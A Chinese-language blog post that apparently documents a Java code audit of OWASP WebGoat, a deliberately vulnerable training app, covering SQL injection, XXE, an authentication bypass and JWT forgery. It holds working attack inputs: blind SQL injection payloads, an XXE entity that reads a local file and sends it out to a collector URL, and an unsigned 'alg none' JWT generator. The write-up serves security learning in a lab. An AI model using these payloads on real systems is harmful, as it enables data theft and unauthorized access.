<!DOCTYPE html>
<html lang="en">
<head><meta name="generator" content="Hexo 3.8.0">
    <meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">

<!--Description-->



    <meta name="description" content="INTJ!">


<!--Author-->


<!--Open Graph Title-->

    <meta property="og:title" content="从WebGoat学习Java代码审计">


<!--Open Graph Description-->

    <meta property="og:description" content="INTJ!">


<!--Open Graph Site Name-->
    <meta property="og:site_name" content="t43M!ne">

<!--Type page-->

    <meta property="og:type" content="article">


<!--Page Cover-->


    <meta property="og:image" content="https://t43wiu6.github.io/img/home-bg.jpg">


<meta name="twitter:card" content="summary_large_image">




    <meta name="twitter:image" content="https://t43wiu6.github.io/img/home-bg.jpg">


<!-- Title -->

<title>从WebGoat学习Java代码审计 - t43M!ne</title>

<!-- Bootstrap Core CSS -->
<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/bootstrap@4.4.1/dist/css/bootstrap.min.css">

<!-- Custom CSS -->
<link rel="stylesheet" href="/css/main.css">

<!-- Custom Fonts -->
<link rel="stylesheet" href="//./css/font-awesome_5.11.0_css_all.min.css">
<link href="//fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic" rel="stylesheet" type="text/css">
<link href="//fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800" rel="stylesheet" type="text/css">

<!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
<!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
<!--[if lt IE 9]>
<script src="//oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
<script src="//oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
<![endif]-->

<!-- Gallery -->
<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/featherlight@1.4.0/src/featherlight.css" integrity="sha256-30DV/STftlyQ6v8yaOWlabammvCYtRJERLj/m0b3zno=" crossorigin="anonymous">
<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/lightgallery@1.6.11/dist/css/lightgallery.min.css">

<!-- favicon -->

<link rel="icon" href="/img/logo.ico">



</head>
<!-- Head tag -->

<body>

    <!-- Menu -->
    <!-- Navigation -->
<nav class="navbar navbar-default navbar-custom navbar-fixed-top bg-transparent position-absolute w-100 p-0" id="nav">
    <div class="container pl-0 pr-0">
        <!-- Brand and toggle get grouped for better mobile display -->
        <div class="navbar-header page-scroll">
            <a class="navbar-brand text-white p-1 pl-3" href="/">t43M!ne</a>
        </div>
        <div class="navbar-nav float-right">
            <button class="btn btn-link search-btn navbar-item" data-toggle="modal" data-target="#searchModal">
                <i class="fas fa-search"></i>
            </button>
        </div>
    </div>
    <!-- /.container -->
</nav>

    <!-- Main Content -->
    <!-- Page Header -->
<!-- Set your background image for this header in your post front-matter: cover -->

<header class="intro-header" style="background-image: url('/img/home-bg.jpg')">
    <div class="container">
        <div class="row">
            <div class="col-lg-12 col-md-12 text-center">
                <div class="post-heading text-white">
                    <h1>从WebGoat学习Java代码审计</h1>
                    
                </div>
            </div>
        </div>
    </div>
</header>

<!-- Post Content -->
<article>
    <div class="container">
        <div class="row">
            <!-- Post Main Content -->
            <div class="col-lg-8 offset-lg-2 col-md-10 offset-md-1">
                
                    <span class="meta d-inline-block">
    
        <i class="far fa-bookmark fa-fw"></i>
        

<a href="/categories/渗透测试/">渗透测试</a>

    
    
    <!-- Date -->
    
        <span class="post-meta-split">&nbsp;|&nbsp;</span>
        <i class="far fa-calendar-check fa-fw"></i>
        April 20,2019
    
    <!-- word count and read count -->
    

    

    
</span>  
                
                <h2 id="说在前面的话"><a href="#说在前面的话" class="headerlink" title="说在前面的话"></a>说在前面的话</h2><blockquote>
<p>补一下以前挖的坑，好多忘了上传…</p>
</blockquote>
<p>以前硬着头皮啃了本php代码审计的书，感觉还是java好玩，这次来学学Java审计。</p>
<blockquote>
<p>ps:目的是熟悉各种漏洞在Java下的表现，所以并没有按着通关要求来做，只是点到为止</p>
</blockquote>
<h2 id="WebGoat环境配置"><a href="#WebGoat环境配置" class="headerlink" title="WebGoat环境配置"></a>WebGoat环境配置</h2><a id="more"></a>
<p>WebGoat是由OWASP维护的基于Java开发的Web应用程序，主要用于安全教学</p>
<ul>
<li><a href="https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project" target="_blank" rel="noopener">[官方网站]</a></li>
<li><a href="https://github.com/WebGoat/WebGoat/releases" target="_blank" rel="noopener">[项目github]</a></li>
</ul>
<p>既然是奔着代码审计来的，那当然是下载源代码啦。<br><!--more--></p>
<p>先导入到idea，(关于maven配置等就不赘述了)，导入成功后maven会自动进行配置<br>项目采用了SpringBoot，直接进入Debug模式</p>
<p><div class="img-item" data-src="springboot.PNG" data-sub-html=".caption"><img src="springboot.PNG" alt="springboot"><div class="img-caption d-block text-center"><span class="center-caption text-muted border-bottom">springboot</span></div></div></p>
<p>访问<code>localhost:8080/WebGoat</code></p>
<p><div class="img-item" data-src="Welcome.PNG" data-sub-html=".caption"><img src="Welcome.PNG" alt="Welcome"><div class="img-caption d-block text-center"><span class="center-caption text-muted border-bottom">Welcome</span></div></div></p>
<p>注册个用户就可以登录了<br>配置好后默认是只能从127.0.0.1访问，如果有需要可以打开这个文件，进行修改</p>
<p><code>webgoat-container/src/main/resources/application.properties</code></p>
<p><div class="img-item" data-src="settings.PNG" data-sub-html=".caption"><img src="settings.PNG" alt="settings"><div class="img-caption d-block text-center"><span class="center-caption text-muted border-bottom">settings</span></div></div></p>
<h2 id="从SQLI开始审计之旅"><a href="#从SQLI开始审计之旅" class="headerlink" title="从SQLI开始审计之旅"></a>从SQLI开始审计之旅</h2><p>注入中第一项是<code>SQL Injection (advanced)</code>,先测试注册功能<br>那么先下个断点跟进到对应业务逻辑类，可以看到这里有一处参数检查</p>
<p><div class="img-item" data-src="sqli-advanced.PNG" data-sub-html=".caption"><img src="sqli-advanced.PNG" alt="sqli-advanced"><div class="img-caption d-block text-center"><span class="center-caption text-muted border-bottom">sqli-advanced</span></div></div></p>
<p>继续跟进，发现只检查了是否为空和长度，然后对用户名进行查重时直接带入了参数<br>而查重后的插入数据使用了预编译<br>鉴于返回到前端的参数只有<code>user.created</code>和<code>user.exists</code>两种。基本确认为盲注</p>
<p>漏洞验证如下，tom用户明明是存在的，但用户依然创建成功证明payload生效，<code>and 1=2</code>导致查询出的用户名不存在从而进入创建流程</p>
<p><div class="img-item" data-src="sqli-advanced-verify.PNG" data-sub-html=".caption"><img src="sqli-advanced-verify.PNG" alt="sqli-advanced-verify"><div class="img-caption d-block text-center"><span class="center-caption text-muted border-bottom">sqli-advanced-verify</span></div></div></p>
<p>那么exp应该是</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">tom<span class="string">'+and+if(ascii(substr(database(),1,1))&gt;100,SLEEP(10),NULL)--+</span></span><br></pre></td></tr></table></figure>
<p>然而报500错误，sql语法不正确，这是因为采用的是<code>HSQLDB</code>，即java内置的数据库<br><code>IF</code>和<code>SLEEP</code>语句是Mysql的扩展语句，emmm</p>
<p><code>IF</code>应该可以使用<code>CASE WHEN THEN ELSE END</code>代替，<code>SLEEP</code>没有找到代替的函数<br>这个是SQLmap给出的时间盲注payload，我没看懂…似乎是重复查询多次达到延时的样子</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">username_reg=tom<span class="string">' AND CHAR(87)||CHAR(90)||CHAR(97)||CHAR(110)=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY(CHAR(65)||CHAR(69)||CHAR(83),NULL),0),500000000),NULL) AND '</span>zDag<span class="string">'='</span>zDag&amp;email_reg=a@gmail.com&amp;password_reg=123&amp;confirm_password_reg=123</span><br></pre></td></tr></table></figure>
<p>后来发现可以直接布尔盲注，tom这个用户名是存在的为true，只要后面为false就会返回<code>user created</code></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">tom<span class="string">'+and+ascii(substr(database(),1,1))&lt;100--+</span></span><br></pre></td></tr></table></figure>
<p><div class="img-item" data-src="sqli-advanced-exp.PNG" data-sub-html=".caption"><img src="sqli-advanced-exp.PNG" alt="sqli-advanced-exp"><div class="img-caption d-block text-center"><span class="center-caption text-muted border-bottom">sqli-advanced-exp</span></div></div></p>
<h2 id="SQLi-5a"><a href="#SQLi-5a" class="headerlink" title="SQLi-5a"></a>SQLi-5a</h2><blockquote>
<p>别问我为什么叫这个奇怪的名字，这是类名….</p>
</blockquote>
<p><div class="img-item" data-src="sqli-5a-route.PNG" data-sub-html=".caption"><img src="sqli-5a-route.PNG" alt="sqli-5a-route"><div class="img-caption d-block text-center"><span class="center-caption text-muted border-bottom">sqli-5a-route</span></div></div></p>
<p>根据form中的url搜索到对应类</p>
<p><div class="img-item" data-src="sqli-5a.PNG" data-sub-html=".caption"><img src="sqli-5a.PNG" alt="sqli-5a"><div class="img-caption d-block text-center"><span class="center-caption text-muted border-bottom">sqli-5a</span></div></div></p>
<p><code>union</code>，<code>堆注入</code>,<code>and/or</code>都可以<br>另一个是数字型注入<code>SQLi-5b</code><br><figure class="highlight java"><table><tr><td class="code"><pre><span class="line">Connection connection = DatabaseUtilities.getConnection(getWebSession());</span><br><span class="line">String query = <span class="string">"SELECT * FROM user_data WHERE userid = "</span> + accountName;</span><br><span class="line"></span><br><span class="line"><span class="keyword">try</span> &#123;</span><br><span class="line">    ...</span><br><span class="line">	ResultSet results = statement.executeQuery(query);</span><br><span class="line">    ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>同上的利用方法</p>
<h2 id="SQLi-6a"><a href="#SQLi-6a" class="headerlink" title="SQLi-6a"></a>SQLi-6a</h2><p>跟5a的利用相同</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line">String query = <span class="string">"SELECT * FROM user_data WHERE last_name = '"</span> + accountName + <span class="string">"'"</span>;</span><br></pre></td></tr></table></figure>
<p><div class="img-item" data-src="sqli-5a-6a-pay.PNG" data-sub-html=".caption"><img src="sqli-5a-6a-pay.PNG" alt="sqli-5a-6a-pay"><div class="img-caption d-block text-center"><span class="center-caption text-muted border-bottom">sqli-5a-6a-pay</span></div></div></p>
<h2 id="XXE-SimpleXXE"><a href="#XXE-SimpleXXE" class="headerlink" title="XXE-SimpleXXE"></a>XXE-SimpleXXE</h2><figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="keyword">try</span> &#123;</span><br><span class="line">    Comment comment = comments.parseXml(commentStr);</span><br><span class="line">    comments.addComment(comment, <span class="keyword">false</span>);</span><br><span class="line">    <span class="keyword">if</span> (checkSolution(comment)) &#123;</span><br><span class="line">        <span class="keyword">return</span> trackProgress(success().build());</span><br><span class="line">    &#125;</span><br><span class="line">&#125; <span class="keyword">catch</span> (Exception e) &#123;</span><br><span class="line">    error = ExceptionUtils.getFullStackTrace(e);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>先看一下<code>commnet</code>类</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">Comment</span> </span>&#123;</span><br><span class="line">    <span class="keyword">private</span> String user;</span><br><span class="line">    <span class="keyword">private</span> String dateTime;</span><br><span class="line">    <span class="keyword">private</span> String text;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>继续跟进<code>parseXml</code></p>
<p><div class="img-item" data-src="xxe-simplexxe-parseXml.PNG" data-sub-html=".caption"><img src="xxe-simplexxe-parseXml.PNG" alt="xxe-simplexxe-parseXml"><div class="img-caption d-block text-center"><span class="center-caption text-muted border-bottom">xxe-simplexxe-parseXml</span></div></div></p>
<p>可以看到<code>SUPPORT_DTD</code>设为了<code>true</code>,即启用了实体引用</p>
<p>同时<code>IS_SUPPORTING_EXTERNAL_ENTITIES</code>设为了<code>true</code>，启用了外部实体引用</p>
<p><div class="img-item" data-src="xxe-simplexxe-payload.PNG" data-sub-html=".caption"><img src="xxe-simplexxe-payload.PNG" alt="xxe-simplexxe-payload"><div class="img-caption d-block text-center"><span class="center-caption text-muted border-bottom">xxe-simplexxe-payload</span></div></div></p>
<p>在d盘根目录下新建一个文件<code>hack.md</code></p>
<blockquote>
<p>ps:<code>file:///</code>不加任何文件名可以列目录</p>
</blockquote>
<p>抓包将xml做一些修改，通过外部实体读取文件，并替换到输出点text中，刷新页面</p>
<p><div class="img-item" data-src="xxe-simplexxe-ssucess.PNG" data-sub-html=".caption"><img src="xxe-simplexxe-ssucess.PNG" alt="xxe-simplexxe-ssucess"><div class="img-caption d-block text-center"><span class="center-caption text-muted border-bottom">xxe-simplexxe-ssucess</span></div></div></p>
<h2 id="XXE-Json"><a href="#XXE-Json" class="headerlink" title="XXE-Json"></a>XXE-Json</h2><p>可见post的表单同时支持json，xml，且默认使用json传输</p>
<p><div class="img-item" data-src="xxe-json-parseXml.PNG" data-sub-html=".caption"><img src="xxe-json-parseXml.PNG" alt="xxe-json-parseXml"><div class="img-caption d-block text-center"><span class="center-caption text-muted border-bottom">xxe-json-parseXml</span></div></div><br>尝试对HTTP头中的<code>content-type</code>进行修改，指定为xml</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">Content-Type: application/xml</span><br></pre></td></tr></table></figure>
<p>使之进入parseXml流程，成功触发XXE漏洞</p>
<h2 id="Blind-XXE"><a href="#Blind-XXE" class="headerlink" title="Blind-XXE"></a>Blind-XXE</h2><figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="keyword">static</span> <span class="keyword">final</span> String CONTENTS = <span class="string">"WebGoat 8.0 rocks... ("</span> + randomAlphabetic(<span class="number">10</span>) + <span class="string">")"</span>;</span><br><span class="line">...</span><br><span class="line">...</span><br><span class="line"><span class="meta">@RequestMapping</span>(method = RequestMethod.POST, consumes = MediaType.ALL_VALUE, produces = MediaType.APPLICATION_JSON_VALUE)</span><br><span class="line"><span class="meta">@ResponseBody</span></span><br><span class="line"><span class="function"><span class="keyword">public</span> AttackResult <span class="title">addComment</span><span class="params">(@RequestBody String commentStr)</span> <span class="keyword">throws</span> Exception </span>&#123;</span><br><span class="line">    <span class="comment">//Solution is posted as a separate comment</span></span><br><span class="line">    <span class="keyword">if</span> (commentStr.contains(CONTENTS)) &#123;</span><br><span class="line">        <span class="keyword">return</span> trackProgress(success().build());</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">        Comment comment = comments.parseXml(commentStr);</span><br><span class="line">        comments.addComment(comment, <span class="keyword">false</span>);</span><br><span class="line">    &#125; <span class="keyword">catch</span> (Exception e) &#123;</span><br><span class="line">        <span class="keyword">return</span> trackProgress(failed().output(e.toString()).build());</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> trackProgress(failed().build());</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>当获取值包含要读取的字符串时，执行<code>return</code></p>
<p>预期解法应该是使用带外通道来回显</p>
<p><div class="img-item" data-src="Blind-XXE-no.PNG" data-sub-html=".caption"><img src="Blind-XXE-no.PNG" alt="Blind-XXE-no"><div class="img-caption d-block text-center"><span class="center-caption text-muted border-bottom">Blind-XXE-no</span></div></div></p>
<p>但我通过原方法进行读取，并没有拦截到</p>
<p>仔细一想…payload确实不包含<code>WebGoat 8.0 rocks... (...</code>这个字符串啊,而且为啥会包含啊</p>
<p>陷入沉思…</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;</span><br><span class="line">	&lt;!ENTITY % file SYSTEM &quot;file:///c:/windows-version.txt&quot;&gt;</span><br><span class="line">	&lt;!ENTITY % all &quot;&lt;!ENTITY send SYSTEM &apos;http://localhost:9090/ping?text=%file;&apos;&gt;&quot;&gt;</span><br><span class="line">	%all;</span><br></pre></td></tr></table></figure>
<p>以上是预期解</p>
<h2 id="Authentication-Bypasses"><a href="#Authentication-Bypasses" class="headerlink" title="Authentication Bypasses"></a>Authentication Bypasses</h2><p><div class="img-item" data-src="AF-complete.PNG" data-sub-html=".caption"><img src="AF-complete.PNG" alt="AF-complete"><div class="img-caption d-block text-center"><span class="center-caption text-muted border-bottom">AF-complete</span></div></div></p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">boolean</span> <span class="title">didUserLikelylCheat</span><span class="params">(HashMap&lt;String,String&gt; submittedAnswers)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">boolean</span> likely = <span class="keyword">false</span>;</span><br><span class="line">    </span><br><span class="line"><span class="keyword">if</span> (submittedAnswers.size() == secQuestionStore.get(verifyUserId).size()) &#123;</span><br><span class="line">            likely = <span class="keyword">true</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span> ((submittedAnswers.containsKey(<span class="string">"secQuestion0"</span>) &amp;&amp; submittedAnswers.get(<span class="string">"secQuestion0"</span>).equals(secQuestionStore.get(verifyUserId)</span><br><span class="line">     .get(<span class="string">"secQuestion0"</span>))) &amp;&amp;</span><br><span class="line">     (submittedAnswers.containsKey(<span class="string">"secQuestion1"</span>) &amp;&amp; submittedAnswers.get(<span class="string">"secQuestion1"</span>).equals(secQuestionStore.get(verifyUserId)</span><br><span class="line">     .get(<span class="string">"secQuestion1"</span>))) ) &#123;</span><br><span class="line">            likely = <span class="keyword">true</span>;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            likely = <span class="keyword">false</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> likely;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">boolean</span> <span class="title">verifyAccount</span><span class="params">(Integer userId, HashMap&lt;String,String&gt; submittedQuestions )</span> </span>&#123;</span><br><span class="line">        <span class="comment">//short circuit if no questions are submitted</span></span><br><span class="line">        <span class="keyword">if</span> (submittedQuestions.entrySet().size() != secQuestionStore.get(verifyUserId).size()) &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="keyword">false</span>;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (submittedQuestions.containsKey(<span class="string">"secQuestion0"</span>) &amp;&amp; !submittedQuestions.get(<span class="string">"secQuestion0"</span>).equals(secQuestionStore.get(verifyUserId).get(<span class="string">"secQuestion0"</span>))) &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="keyword">false</span>;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (submittedQuestions.containsKey(<span class="string">"secQuestion1"</span>) &amp;&amp; !submittedQuestions.get(<span class="string">"secQuestion1"</span>).equals(secQuestionStore.get(verifyUserId).get(<span class="string">"secQuestion1"</span>))) &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="keyword">false</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// else</span></span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">true</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>简单来说就是提交两个参数<code>secQuestion0</code>,<code>secQuestion1</code>判断是否与设定的相等<br>相等判断为作弊…返回失败<br>不相等则进行下次比较，但这次又要求相等才返回成功…非常有CTF味道的一道题emmm</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line">Map &lt;String,String&gt; userAnswers = <span class="keyword">new</span> HashMap&lt;&gt;();</span><br><span class="line">List&lt;String&gt; paramNames = Collections.list(req.getParameterNames());</span><br><span class="line"><span class="keyword">for</span>  (String paramName : paramNames) &#123;</span><br><span class="line">    <span class="comment">//String paramName = req.getParameterNames().nextElement();</span></span><br><span class="line">    <span class="keyword">if</span> (paramName.contains(<span class="string">"secQuestion"</span>)) &#123;</span><br><span class="line">        userAnswers.put(paramName,req.getParameter(paramName));</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">return</span> (HashMap)userAnswers;</span><br></pre></td></tr></table></figure>
<p>仔细一看，参数的传递并不是通过<code>@RequestParam</code>指定的</p>
<p>而且判断参数时只判断了是否包含<code>SecQuestion</code>字段<br>可以篡改参数<code>secQuestion0</code>为<code>secQuestion2</code>以及<code>secQuestion1</code>为<code>secQuestion3</code>，达到绕过目的</p>
<p><div class="img-item" data-src="AF-rs.PNG" data-sub-html=".caption"><img src="AF-rs.PNG" alt="AF-rs"><div class="img-caption d-block text-center"><span class="center-caption text-muted border-bottom">AF-rs</span></div></div></p>
<p>这里展现了一处由逻辑漏洞引发的身份验证失效与越权问题，比较有意思</p>
<h2 id="JWT-tokens-4"><a href="#JWT-tokens-4" class="headerlink" title="JWT tokens-4"></a>JWT tokens-4</h2><p><strong>JSON WEB Token</strong>（<strong>JWT</strong>），是一种基于JSON的、用于令牌标识（token）</p>
<p>近年来RESTful API开始风靡，使用HTTP header来传递认证令牌似乎变得理所应当，但是很多开发者误用了jwt，这个东西也有它的缺点，比如</p>
<ul>
<li>一旦颁发票据，就无法作废。</li>
</ul>
<blockquote>
<p>所有的认证信息都在JWT中，由于在服务端没有状态，即使你知道了某个JWT被盗取了，你也没有办法将其作废。在JWT过期之前（你绝对应该设置过期时间），你无能为力。</p>
</blockquote>
<ul>
<li>存储问题</li>
</ul>
<blockquote>
<p> JWT的存储选项有local storage、session storage和cookie<br> 放到cookie意味着不能httponly，产生了XSS风险<br> 放到storage，安全问题更加严重。</p>
</blockquote>
<p>可见JWT其实比较适合一次性的命令认证，而不太适用于session</p>
<h3 id="JWT构成"><a href="#JWT构成" class="headerlink" title="JWT构成"></a>JWT构成</h3><p>JWT通常由三部分组成: 头信息（header）, 消息体（payload）和签名（signature），签名部分用于确保前两个数据块不被篡改。</p>
<p><div class="img-item" data-src="AF-token.PNG" data-sub-html=".caption"><img src="AF-token.PNG" alt="AF-token"><div class="img-caption d-block text-center"><span class="center-caption text-muted border-bottom">AF-token</span></div></div></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">access_token=</span><br><span class="line">eyJhbGciOiJIUzUxMiJ9.</span><br><span class="line">eyJpYXQiOjE1NTgwMTUxNDksImFkbWluIjoiZmFsc2UiLCJ1c2VyIjoiU3lsdmVzdGVyIn0.</span><br><span class="line">ZmbN4mmCkFtBRThUQRRpjQxa2NTLlK3jGv689_DHO4bglB6yePRuo3JXwQ2miASNL7HFgQCLm6qV618s8XXDHg;</span><br></pre></td></tr></table></figure>
<p>对抓到的请求包的cookie进行base64解码</p>
<figure class="highlight"><table><tr><td class="code"><pre><span class="line">&#123;</span><br><span class="line">	<span class="attr">"alg"</span>:<span class="string">"HS512"</span></span><br><span class="line">&#125;</span><br><span class="line">.</span><br><span class="line">&#123;</span><br><span class="line">	<span class="attr">"iat"</span>:<span class="number">1558015149</span>,</span><br><span class="line">	<span class="attr">"admin"</span>:<span class="string">"false"</span>,</span><br><span class="line">	<span class="attr">"user"</span>:<span class="string">"Sylvester"</span></span><br><span class="line">&#125;</span><br><span class="line">.</span><br><span class="line">ZmbN4mmCkFtBRThUQRRpjQxa2NTLlK3jGv689_DHO4bglB6yePRuo3JXwQ2miASNL7HFgQCLm6qV618s8XXDHg</span><br></pre></td></tr></table></figure>
<h4 id="JWT的攻击面"><a href="#JWT的攻击面" class="headerlink" title="JWT的攻击面"></a>JWT的攻击面</h4><ul>
<li>未校验签名</li>
<li>禁用哈希</li>
<li>密钥暴破</li>
</ul>
<p>尝试篡改admin值，若服务端没有作签名校验，将导致直接越权。</p>
<figure class="highlight"><table><tr><td class="code"><pre><span class="line">&#123;"alg":"HS512"&#125;.&#123;"iat":1558015149,"admin":"true","user":"Sylvester"&#125; In0.ZmbN4mmCkFtBRThUQRRpjQxa2NTLlK3jGv689_DHO4bglB6yePRuo3JXwQ2miASNL7HFgQCLm6qV618s8XXDHg</span><br></pre></td></tr></table></figure>
<p>或者使用<code>pyjwt</code>生成空签名的<code>jwt token</code></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">pip install pyjwt</span><br><span class="line"></span><br><span class="line">import jwt</span><br><span class="line">jwt.encode(&#123;<span class="string">'iat'</span>: 1558015149, <span class="string">"admin"</span>:<span class="string">"true"</span>,<span class="string">"user"</span>:<span class="string">"Sylvester"</span>&#125;, algorithm=<span class="string">'none'</span>, key=<span class="string">''</span>)</span><br><span class="line"></span><br><span class="line">eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJpc3MiOiJmYW5ydWFuIiwiaWF0IjoxNTc1NDI1MjkyLCJleHAiOjE1NzU0Mjg4OTIsInN1YiI6ImFkbWluIiwiZGVzY3JpcHRpb24iOiJhZG1pbihhZG1pbikiLCJqdGkiOiJqd3QifQ.</span><br></pre></td></tr></table></figure>
<blockquote>
<p>到这里腰斩了，不限期咕咕咕。毕竟离校之后很难再有那样大块的时间了…<br>看到这里是不是很蛋疼。本来没打算发的，想想还是发吧hhh</p>
</blockquote>

            </div>

            <!-- Post information -->
            
    <div class="col-lg-8 offset-lg-2 col-md-10 offset-md-1 post-tags">
        
            <i class="fas fa-tag" style="vertical-align: middle;font-size: .8rem;"></i>
            tags:&nbsp;
            
            
        
            <a href="/tags/渗透测试/">#渗透测试</a> <a href="/tags/代码审计/">#代码审计</a>
        
    </div>

            
    <div class="col-lg-8 offset-lg-2 col-md-10 offset-md-1">
        <ul class="pagination d-block text-center">
            
                <li class="previous page-item d-inline"><a href="/2019/12/20/ShellCode-Loader/" class="page-link float-left">&larr;  Newer</a></li>
            
            
                <li class="next page-item d-inline"><a href="/2019/04/20/Metasploit-All-In-One/" class="page-link float-right">Older  &rarr;</a></li>
            
        </ul>
    </div>


            
                <!-- Comments -->
                

                

            

        </div>
    </div>
</article> 


    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/tocbot/4.4.2/tocbot.css">
    <style>
        #toc-content .toc-link::before {
            background-color: transparent;
            max-height: 25px;
        }

        #toc-content .toc-link.is-active-link::before {
            background-color: #404040;
        }
    </style>
    <script src="//cdnjs.cloudflare.com/ajax/libs/tocbot/4.4.2/tocbot.min.js"></script>
    <div class="ui-toc dropup scrollspy-body pull-right" style="right: 3%;">
        <button type="button" class="toc-btn btn btn-light" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" data-display="static">
            <i class="fas fa-list"></i>
        </button>
        <div class="dropdown-menu dropdown-menu-right p-2" aria-labelledby="tocLabel">
            <div class="toc-widget">
                <div id="toc-content" class="text-truncate">
                </div>
            </div>
            <div class="toc-menu pt-3 pl-4">
                <a class="expand-toggle d-block py-1" href="#"><span class="expand-text">Expand all</span><span class="close-text" style="display: none;">Collapse all</span></a>
                <a class="back-to-top d-block py-1" href="#">Back to top</a>
                <a class="go-to-bottom d-block py-1" href="#">Go to bottom</a>
            </div>
        </div>
    </div>
    <script>
        tocbot.init({
            // Where to render the table of contents.
            tocSelector: '#toc-content',
            // Where to grab the headings to build the table of contents.
            contentSelector: 'article',
            // Which headings to grab inside of the contentSelector element.
            headingSelector: 'h1, h2, h3',
            // For headings inside relative or absolute positioned containers within content.
            hasInnerContainers: true,
        });
    </script>


    


    <!-- Footer -->
    <hr>

<!-- Footer -->
<footer id="footer">
    <div class="container">
        <div class="row">
            <div class="col-lg-8 offset-lg-2 col-md-10 offset-md-1 text-center">
                <ul class="list-inline">
                    

                    

                    

                    

                    

                    
                </ul>
                <ul class="copyright footer-menu list-inline">
                    
                    
                        <li class="list-inline-item">
                            
                            
                            <a href="/">
                                
                                    Home
                                
                            </a>
                        </li>
                    
                        <li class="list-inline-item">
                            
                                <span class="copyright-split">&nbsp;|&nbsp;</span>
                            
                            
                            <a href="/archives">
                                
                                    Archives
                                
                            </a>
                        </li>
                    
                        <li class="list-inline-item">
                            
                                <span class="copyright-split">&nbsp;|&nbsp;</span>
                            
                            
                            <a href="/tags">
                                
                                    Tags
                                
                            </a>
                        </li>
                    
                        <li class="list-inline-item">
                            
                                <span class="copyright-split">&nbsp;|&nbsp;</span>
                            
                            
                            <a href="/categories">
                                
                                    Categories
                                
                            </a>
                        </li>
                    
                        <li class="list-inline-item">
                            
                                <span class="copyright-split">&nbsp;|&nbsp;</span>
                            
                            
                            <a href="/about">
                                
                                    About
                                
                            </a>
                        </li>
                    
                </ul>
                <p class="copyright footer-author">
                    &copy; -2020 
                    <a rel="external" class="copyright-link" href="t43" target="_blank">t43M!ne</a><br>
                    Powered by <a rel="external" class="copyright-link" href="https://hexo.io/" target="_blank">Hexo</a>  
                    <span class="copyright-split">&nbsp;|&nbsp;&nbsp;</span>
                    Theme <a rel="external" class="copyright-link" href="https://github.com/luswdev/hexo-theme-clean.git" target="_blank">Clean</a>
                    
                    
                </p>
            </div>
        </div>
    </div>
</footer>


    <!-- After footer scripts -->
    <!-- jQuery -->
<script src="//cdn.jsdelivr.net/npm/jquery@2.1.4/dist/jquery.min.js"></script>

<!-- For drop down -->
<script src="//cdn.jsdelivr.net/npm/popper.js@1.16.0/dist/umd/popper.min.js"></script>

<!-- Bootstrap -->
<script src="//cdn.jsdelivr.net/npm/bootstrap@4.4.1/dist/js/bootstrap.min.js"></script>
<!-- Gallery -->
<script src="//cdn.jsdelivr.net/npm/lightgallery@1.6.11/dist/js/lightgallery-all.min.js"></script>
<!-- Busuanzi -->


<!-- Search script -->
<script src="/js/search.js"></script>
<script type="text/javascript">
    $(function () {
        searchFunc("/" + "search.xml", 'searchInput', 'searchResult');
    });
</script>


<script src="/js/main.js"></script>


    <!-- Search Modal -->
    <!-- Modal -->
<div class="modal fade" id="searchModal" tabindex="-1" role="dialog" aria-labelledby="myModalLabel">
